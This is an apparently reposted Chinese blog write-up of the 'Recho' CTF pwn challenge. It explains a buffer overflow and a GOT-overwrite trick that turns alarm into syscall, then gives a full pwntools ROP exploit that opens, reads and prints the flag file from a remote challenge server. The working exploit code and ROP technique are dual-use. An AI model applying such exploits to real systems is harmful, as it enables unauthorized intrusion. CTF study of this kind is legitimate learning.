[pwn]ROP:灵活运用syscall

其他 2020-03-02 11:37:16 阅读次数: 0

灵活运用syscall

遇到了一个程序并不复杂,但利用却很麻烦的题目,Recho题目详细writeup,题目地址:Recho

按照惯例,查看安全策略:
在这里插入图片描述
基本没啥安全策略,然后查看程序逻辑,程序很短,就一个main:
在这里插入图片描述
很容易就找到溢出点,大体逻辑就是,先输入一个数,小于15会被认为是16,然后再输入一串字符串,程序会将前x(刚输入的数字)个字符拷贝到buf中,这里没有上限,所以存在溢出。但问题是,while(read())函数,只有当read()=0的时候才会结束,试了好多种能让read返回0的方法,只有中断程序才可以。那么面临的问题就是,中断程序之后不能继续操作了,所以只能一个ROP一R到底。

试着寻找一下是否有后门,真的发现了flag字符串:
在这里插入图片描述
也没有使用system函数,也没有给libc版本。这里可以采用syscall来获取flag。

syscall汇编指令执行时会根据eax的值来执行不同的函数(功能),对应表

但我们这个程序中并没有syscall函数:
在这里插入图片描述
那么我们还要熟悉在libc中使用syscall的函数,比如这个程序中就有的alarm函数:
在这里插入图片描述
可见,在alarm中调用了0x25号syscall,也就是sys_alarm。并且syscall的地址比alarm地址多5,这里由于不同libc中alarm地址不同,但syscall和alarm相对便宜是不变的5,所以只要想办法将got表中的alarm地址+5,那么就会将alarm变为syscall的功能,但我们需要自己手动给eax赋值。

有了syscall,我们就可以使用open()flag文件,然后将flag读取到程序中,从截止位置开始读就可以。然后再write写出来。那么我们需要一些gadget,首先是pop eax;ret的:
在这里插入图片描述
只有一个,正好,然后程序给了通用gadget:
在这里插入图片描述
然后还需要一个给alarm_got加5的,搜索一下add:
在这里插入图片描述
要选给指针内容+5的,这里没有直接+5,我们可以pop给rax5,然后再加al,通用gadget中有pop rdi;ret,所以可以选择这个gadget。

接下来万事具备,可以开始编写利用代码:

from pwn import *
p=remote('111.198.29.45',36835)
elf = ELF('./d7820a9699814e8480efa2d3a83c1533')

poprax_addr = 0x4006fc  #pop rax;ret
poprdi_addr = 0x4008a3  #pop rdi;ret
ppppppr_addr=0x40089A   #通用gadget
mmmc_addr=0x400880		#通用gadget
addrdi_addr = 0x40070d	#edi=edi+al
flag = 0x601058			#falg_addr
binsh_addr=0x601090		#存放binsh

alarm_got = elf.got['alarm']
read_plt = elf.plt['read']
read_got = elf.got['read']
write_plt = elf.plt['write']
write_got = elf.got['write']
alarm_plt = elf.plt['alarm']

#修改alarm_got
payload='A'*0x38+p64(poprax_addr)+p64(0x05)+p64(poprdi_addr)+p64(alarm_got)+p64(addrdi_addr)
#调用open,先将eax置2,然后使用通用gadget打开flag
payload+=p64(poprax_addr)+p64(0x02)+p64(ppppppr_addr)+p64(0)+p64(1)+\
    p64(alarm_got)+p64(0)+p64(0)+p64(flag)+p64(mmmc_addr)+'A'*56
#用read读文件,将flag读入程序末尾
payload+=p64(ppppppr_addr)+p64(0)+p64(1)+\
    p64(read_got)+p64(0x30)+p64(binsh_addr)+p64(0x03)+p64(mmmc_addr)+'A'*56
#用write将刚读入的flag输出
payload+=p64(ppppppr_addr)+p64(0)+p64(1)+\
    p64(write_got)+p64(0x30)+p64(binsh_addr)+p64(0x01)+p64(mmmc_addr)

p.recvuntil('Welcome to Recho server!\n')
p.send(str(0x200) + '\n')
p.send(payload.ljust(0x200, '\x00'))
p.recv()
p.shutdown("send")   #中断输入
p.interactive()

成功!
在这里插入图片描述
总结一下就是,需要记住shutdown(“send”)可以中断输入,还有就是记得一些libc中有syscall的函数,再者灵活搜索程序中有的gadget。

breezeO_o
发布了56 篇原创文章 · 获赞 288 · 访问量 18万+
私信 关注

猜你喜欢

转载自blog.csdn.net/Breeze_CAT/article/details/100087036
今日推荐
基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个!
美国拟限制 AI 大模型出口中国和俄罗斯
苹果将与 OpenAI 达成协议,将 ChatGPT 应用于 iPhone
openKylin 社区生态委员会第六次会议圆满召开
阿里云正式发布通义千问 2.5
Python 3.13 发布首个 Beta:实验性自由线程模式和 JIT、改进交互式解释器
Stack Overflow 拿我的代码去训练 AI 大模型,还封了我的账号
Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作
报告:Django 仍然是 74% 开发者的首选
《2024 年一季度互联网投融资运行情况》研究报告
15 年前上了“FFmpeg 耻辱柱”,今天他还得谢谢咱——腾讯QQPlayer一雪前耻?
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
周排行
BPM为企业带来的实际利益
好程序员web前端分享css常用属性缩写
Java文件下载(excel)
css样式的动态添加及显示和隐藏等零碎用法
axios全局配置以及拦截器
使用Logstash来实时同步MySQL和log日志数据到ES
C++获取当前时间(年月日、时分秒、毫秒)
Odoo产品分析 (四) -- 工具板块(11) -- 网站即时聊天(1)
Java环境配置正确,但是java、javac、java -version均返回“不是内部或外部命令,也不是可运行的程序或批处理文件”?
01 官网下载各种CentOS教程(超详细版)
每日归档
更多
2024-05-14(0)
2024-05-13(18)
2024-05-12(0)
2024-05-11(38)
2024-05-10(38)
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022